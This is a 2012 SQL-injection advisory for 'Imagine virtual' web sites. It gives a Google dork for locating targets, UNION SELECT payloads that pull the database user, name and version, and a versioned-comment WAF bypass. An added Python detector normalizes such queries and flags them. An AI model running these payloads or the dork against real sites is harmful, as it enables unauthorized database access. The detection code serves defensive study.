# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# Imagine virtual SQL Injection Vulnerability
# Google Dork: intext:"Design by imagine virtual" inurl:".php?id="
# Date: 15/12/2012
# Author: Sys32
# Email: tha.Sys32[at]gmail[dot]com
# Vendor: http://www.imaginevirtual.com
# Category: Webapp
# Tested on: Backtrack 5 r3
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# I. INFO.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# The application is vulnerable to SQL injection in the "id" parameter, allowing an attacker to gain full access to the database.
# Some injections need a WAF bypass.
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# II. EXPLOIT.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# http://127.0.0.1/vull-page.php?id=[Sql-Injection]
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# III. EXPLOIT Example.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# Injection:
#
# http://127.0.0.1/Vull-page.php?id=-3 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
# http://127.0.0.1/vull-page.php?id=-7' UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11+--+
#
# Injection + WAF Bypass:
#
# http://127.0.0.1/Vull-page.php?id=-3 /*!20000union*/+/*!20000SelEct*/ 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
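# Added example (not part of the original advisory and not vendor code): a defender-side check that
# normalizes a request's query string the way MySQL reads it (URL-decoding, keeping the body of
# /*!NNNNN ... */ versioned comments, collapsing whitespace) and then looks for the UNION SELECT and
# CONCAT_WS(CHAR(...)) pattern above. The request lines and the "vull-page.php" path are constructed
# placeholders. It shows that a naive "union\s+select" regex misses the versioned-comment variant
# while the normalized check catches both.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines shaped like the advisory's payloads (placeholder path, no real host).
SAMPLE_REQUESTS = [
    "GET /vull-page.php?id=4 HTTP/1.1",
    "GET /vull-page.php?id=-3%20union%20select%201,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4-- HTTP/1.1",
    "GET /vull-page.php?id=-3%20/*!20000union*/+/*!20000SelEct*/%201,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4-- HTTP/1.1",
]

# MySQL executes the body of /*!NNNNN body */ when its version is >= NNNNN; a WAF that treats it as a
# comment sees nothing, so normalization must keep the body. Plain /* ... */ is whitespace to MySQL.
VERSIONED_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.DOTALL)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

# What a naive WAF rule typically looks for.
NAIVE = re.compile(r"union\s+select", re.IGNORECASE)

# Signals checked against the normalized query (all lower-case, single spaces).
SIGNALS = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+|distinct\s+)?\bselect\b"),
    "concat_ws_char": re.compile(r"\bconcat_ws\s*\(\s*char\s*\("),
    "mysql_info_functions": re.compile(r"\b(?:user|database|version)\s*\(\s*\)"),
}


def normalize(query: str) -> str:
    """Collapse the obfuscation used in the advisory into the SQL text MySQL would actually parse."""
    s = unquote_plus(query)                 # %20 and '+' both become spaces
    s = VERSIONED_COMMENT.sub(r" \1 ", s)   # /*!20000union*/ -> union
    s = PLAIN_COMMENT.sub(" ", s)           # /* anything */ -> whitespace
    s = re.sub(r"\s+", " ", s)
    return s.strip().lower()


def classify(request_line: str) -> dict:
    """Return whether the naive rule fires and which normalized signals match for one request line."""
    path = request_line.split(" ", 2)[1]
    query = path.partition("?")[2]
    norm = normalize(query)
    return {
        "naive_hit": bool(NAIVE.search(unquote_plus(query))),
        "signals": [name for name, pat in SIGNALS.items() if pat.search(norm)],
        "normalized": norm,
    }


def scan(lines):
    """Classify every request line; suitable for feeding access-log request fields."""
    return [classify(line) for line in lines]


if __name__ == "__main__":
    for result in scan(SAMPLE_REQUESTS):
        print(result)
```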
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# IV. Risk.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# The security risk of the remote SQL injection vulnerability is estimated as critical.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''